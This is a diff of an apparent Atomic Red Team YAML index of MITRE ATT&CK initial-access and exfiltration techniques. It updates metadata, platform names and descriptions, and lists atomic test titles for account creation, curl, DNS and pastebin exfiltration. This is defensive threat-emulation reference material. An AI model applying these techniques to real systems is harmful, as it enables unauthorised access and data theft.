-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -97218,7 +98142,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -97273,7 +98197,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -97336,11 +98259,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -97355,6 +98277,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -97363,18 +98286,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -97406,9 +98329,6 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin privileges
@@ -97480,7 +98400,7 @@ initial-access:
         elevation_required: true
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -97491,6 +98411,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -97499,22 +98424,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -97539,36 +98460,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -97597,9 +98501,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -97617,7 +98521,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -97655,11 +98563,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -97676,7 +98583,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -97686,7 +98592,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -97695,19 +98601,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -97755,11 +98659,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -97779,10 +98684,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -97815,7 +98718,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -97854,7 +98756,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -97869,7 +98771,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -97949,11 +98850,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -98009,11 +98909,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -98074,8 +98973,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -98103,13 +99002,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -98149,8 +99047,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -98158,13 +99058,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -98195,14 +99095,11 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -98269,11 +99166,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -98325,9 +99221,8 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges
@@ -98411,7 +99306,7 @@ initial-access:
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -98435,10 +99330,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -98457,13 +99351,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -98502,9 +99395,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -98554,7 +99446,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -98574,7 +99465,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -98594,8 +99485,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -98642,7 +99531,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -98662,7 +99550,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -98684,8 +99572,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -98739,7 +99625,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests:
     - name: IcedID Botnet HTTP PUT
@@ -98825,7 +99710,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -98860,12 +99745,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -98890,11 +99773,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -98937,9 +99819,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -98986,7 +99867,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -99012,7 +99892,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -99045,8 +99925,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests:
     - name: Exfiltrate data HTTPS using curl windows
@@ -99093,7 +99971,7 @@ exfiltration:
           '
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -99142,7 +100020,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests:
     - name: C2 Data Exfiltration
@@ -99206,7 +100083,7 @@ exfiltration:
         name: powershell
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -99242,12 +100119,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -99256,7 +100132,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -99280,9 +100155,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests:
     - name: DNSExfiltration (doh)
@@ -99357,7 +100231,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -99379,8 +100253,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -99431,7 +100303,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests:
     - name: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)
@@ -99507,7 +100378,6 @@ exfiltration:
